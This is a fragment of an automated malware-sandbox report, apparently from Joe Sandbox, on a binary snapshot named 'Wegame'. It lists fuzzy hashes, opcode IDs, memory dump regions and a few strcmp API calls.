                                                                • Instruction Fuzzy Hash: 6AC012156005018E876477A7181778C2541D751739FD0875BF825D71C3DE0C4900025F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C0,?), ref: 00462424
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C4,?), ref: 00462437
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821C8,?), ref: 0046244A
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(004821CC,?), ref: 0046245D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: strcmp
                                                                • String ID:
                                                                • API String ID: 1004003707-0
                                                                • Opcode ID: d2a7f35e11463ab55d4c3be82003c461c81b3f0dfcca73dcb63236994c432ba2
                                                                • Instruction ID: 9e073be963b8227a51d3bd8ec7a743c5b55eaa0f74008f5f4be7368270c39741
                                                                • Opcode Fuzzy Hash: d2a7f35e11463ab55d4c3be82003c461c81b3f0dfcca73dcb63236994c432ba2
                                                                • Instruction Fuzzy Hash: 49F0283B204F17754A143EA999029AE3394AB017B8338402BF444410C2FEAAE44586FF
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%